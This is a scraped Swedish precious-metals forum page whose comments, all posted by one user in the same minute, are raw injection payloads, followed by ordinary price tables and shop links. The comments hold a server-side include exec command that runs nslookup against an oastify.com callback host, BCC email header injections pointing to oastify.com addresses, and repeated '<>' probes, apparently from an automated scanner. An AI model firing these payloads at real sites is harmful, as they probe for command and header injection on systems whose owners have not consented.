Herr Offer 2023-09-25 13:42

"-->'-->`--><!--#set var="ijl" value="hik64bz35i"--><!--#set var="kln" value="jkm86d157k"--><!--#echo var="ijl"--><!--#echo var="kln"--><!--#exec cmd="nslookup -q=cname 457trymqs5tqok114h3aui55ww2tqlo9g74cr9fy.oastify.com" -->

Herr Offer 2023-09-25 13:42


BCC:icy7yct4zj04vy8fbvao1wcj3a97xzvnngblyim7@oastify.com
akj: h

Herr Offer 2023-09-25 13:42

>
BCC:nwncihd9jok9f3skv0utl1wonftch4fs7mvrio6d@oastify.com
scu: m

Herr Offer 2023-09-25 13:42

<>

Herr Offer 2023-09-25 13:42

<>

Herr Offer 2023-09-25 13:42

<>

Herr Offer 2023-09-25 13:42

<>

Herr Offer 2023-09-25 13:42

<>

Herr Offer 2023-09-25 13:42

<>

Herr Offer 2023-09-25 13:42

<>

Herr Offer 2023-09-25 13:42

<>

Herr Offer 2023-09-25 13:42

<>

Herr Offer 2023-09-25 13:42

<>

Herr Offer 2023-09-25 13:42

<>

Herr Offer 2023-09-25 13:42

<>

Herr Offer 2023-09-25 13:42

<>
Logga in för att kommentera.

Guld- och silverpriser

Ädelmetall Spotpris spot price info +/- % spot price change info
Guld 816,16 kr 0.15%
Silver 10,42 kr -1.88%
Platina 339,47 kr -0.28%
Palladium 327,86 kr -2.29%
Uppdaterat: 2024-07-12 22:25 CET

Förklaring prissättning och prispremier för ädelmetall

Liberty Silvers Nyhetsbrev

Prenumerera på Liberty Silvers kostnadsfria nyhetsbrev för ädelmetallrelaterade nyheter.

Prenumerera
Forumet uppdateras inte längre p.g.a. teknikförändringar inför kommande uppdatering av hemsidan. Tidigare poster finns arkiverade här.

Prisgaranti hos Liberty Silver

Köp Liberty Silver mynt Mer information om
Liberty Silver mynten